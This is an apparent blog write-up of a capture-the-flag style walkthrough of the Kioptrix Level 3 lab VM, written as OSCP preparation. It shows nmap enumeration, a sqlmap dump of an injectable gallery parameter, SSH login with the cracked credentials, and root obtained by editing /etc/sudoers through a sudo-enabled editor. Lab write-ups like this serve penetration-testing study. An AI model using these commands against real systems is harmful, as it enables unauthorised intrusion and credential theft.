Kioptrix: Level 3

I have 18 more days to prepare for OSCP.


Enumeration

I ran netdiscover to find the IP of the vulnerable box.

netdiscover -i eth0 

I got the results 192.168.33.135 then ran a nmap scan.

nmap -p- -sV -sS -T4 -A -oX Kioptrixlvl3.xml 192.168.33.135

Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-05-18 18:53 EDT
Nmap scan report for 192.168.33.135
Host is up (0.00041s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security – Got Goat? Security …
MAC Address: 00:0C:29:45:7D:DE (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 – 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT ADDRESS
1 0.41 ms 192.168.33.135

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.48 seconds


Apache httpd port 80

Browsing to http://192.168.33.135/ I saw a blog, login screen for Lotus CMS and gallery.

I ran a dirbuster to check for other pages.

I checked for phpmyadmin and it required me a username and password.


Exploitation

I found a SQL injection vulnerability under this link.

http://kioptrix3.com/gallery/gallery.php?id=1

I used sqlmap to automate the sql injection and cracking of hashes extracted by sqlmap.

sqlmap –dump -u “http://kioptrix3.com/gallery/gallery.php?id=1”

I tried to use the credentials on phpmyadmin and LotusCMS but it didn’t work.

Then, I tried to login using the gathered credentials to SSH, which worked this time.

Dreg and Loneferret has a limited shell and only Loneferret has an access to the web application files.

Using Loneferret credentials I logged on the server thru SSH and found a file CompanyPolicy.README.

I checked the contents of the CompanyPolicy.README.

Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command ‘sudo ht’.
Failure to do so will result in you immediate termination.

DG
CEO

I checked the location and the permission of HT.

whereis ht

ht: /usr/local/bin/ht

ls -l /usr/local/bin/ht

-rwsr-sr-x 1 root root 2072344 2011-04-16 07:26 /usr/local/bin/ht

I found a SUID binary which means I can edit any files I want.

I tried to access /etc/sudoers

cat /etc/sudoers

Obviously, permission denied.

I tried opening the file using sudo ht but I encountered an error xterm-256.

sudo ht

I fixed this by running this command.

export TERM=xterm

I ran sudo ht again and opened the file /etc/sudoers.

Under user privilege specification I added /bin/sh to Loneferret, then I saved and exit.

I ran sudo /bin/sh

sudo /bin/sh


Extra

I found the credentials for phpmyadmin under /home/www/kioptrix3.com/gallery/gconfig.php

cat gconfig.php

Leave a Reply

Your email address will not be published. Required fields are marked *

Check this * Time limit is exhausted. Please reload the CAPTCHA.